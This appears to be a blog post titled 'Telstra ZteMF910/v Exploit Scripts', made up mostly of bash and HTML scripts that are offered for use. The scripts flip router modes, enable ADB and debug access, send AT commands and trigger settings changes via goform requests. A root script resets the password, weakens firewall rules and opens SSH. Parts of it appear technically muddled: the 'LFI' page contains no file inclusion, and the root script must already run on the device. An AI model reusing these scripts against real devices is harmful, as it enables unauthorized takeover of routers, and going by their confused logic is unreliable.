Telstra ZteMF910/v Exploit Scripts

 Telstra ZteMF910/v Exploit Scripts

To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB

To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

language-bash
#!/bin/bash # Mode Switching MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X" MODE_SWITCH_VALUE="1" # Change X to 0 or 1 curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" $MODE_SWITCH_URL # Enabling ADB ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X" ADB_ENABLE_VALUE="6" # Change X to the desired mode (1-4 for RNDIS, 5 for CDC, 6 for ADB) curl -s -X POST -d "goformId=USB_MODE_SWITCH&usb_mode=$ADB_ENABLE_VALUE" $ADB_ENABLE_URL

Save the above script as mode_switch.sh and execute it using bash mode_switch.sh. This will perform mode switching and enable ADB on the router.

Executing AT Commands and Enabling Debug Mode

To execute AT commands and enable debug mode on the ZTE MF910V router, we can use the same bash script as above. However, we need to modify the URLs and values accordingly. Here's an example:

language-bash
#!/bin/bash # Executing AT Commands AT_COMMANDS_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=AT_COMMAND&command=AT+COMMAND_HERE" curl -s -X POST -d "goformId=AT_COMMAND&command=AT+COMMAND_HERE" $AT_COMMANDS_URL # Enabling Debug Mode DEBUG_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X" DEBUG_ENABLE_VALUE="1" # Change X to 0 or 1 curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$DEBUG_ENABLE_VALUE" $DEBUG_ENABLE_URL

Save the above script as at_commands.sh and execute it using bash at_commands.sh. This will execute AT commands and enable debug mode on the router.

Exploiting LFI (Local File Inclusion)

To exploit the LFI vulnerability on the ZTE MF910V router, we need to modify certain files and uncomment specific functions. We can achieve this by creating an HTML file that makes the necessary changes. Here's an example:

language-html
<!DOCTYPE html> <html> <head> <script> function enableSDCard() { var xhr = new XMLHttpRequest(); xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd_card_state&cfg_value=1", true); xhr.send(); } function enableHttpShare() { var xhr = new XMLHttpRequest(); xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1", true); xhr.send(); } function enableSDCardMenu() { var xhr = new XMLHttpRequest(); xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd&cfg_value=1", true); xhr.send(); } function enableSDCardFileViewer() { var xhr = new XMLHttpRequest(); xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare&cfg_value=1", true); xhr.send(); } </script> </head> <body> <button onclick="enableSDCard()">Enable SD Card</button> <button onclick="enableHttpShare()">Enable HTTP Share</button> <button onclick="enableSDCardMenu()">Enable SD Card Menu</button> <button onclick="enableSDCardFileViewer()">Enable SD Card File Viewer</button> </body> </html>

Save the above code as exploit.html and open it in a web browser. Clicking on the buttons will send the necessary HTTP requests to enable the corresponding features.

Gaining Root Access

To gain root access on the ZTE MF910V router, we need to modify certain files and execute specific commands. We can achieve this by creating a bash script. Here's an example:

language-bash
#!/bin/bash # Modify firewall_init.sh sed -i '92,93s/^/#/' /usr/zte/zte_conf/scripts/firewall_init.sh echo -e "echo 'password\npassword\n' | passwd" >> /usr/zte/zte_conf/scripts/firewall_init.sh # Enable SSH iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT # Reboot the device reboot

Save the above script as root_access.sh and execute it using bash root_access.sh. This will modify the necessary files, enable SSH, and reboot the device. After the reboot, you can SSH into the router using the specified username and password.

Comments

Popular posts from this blog

f@st3864 Telnet/Serial

ZTE MF910V Root exploit

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug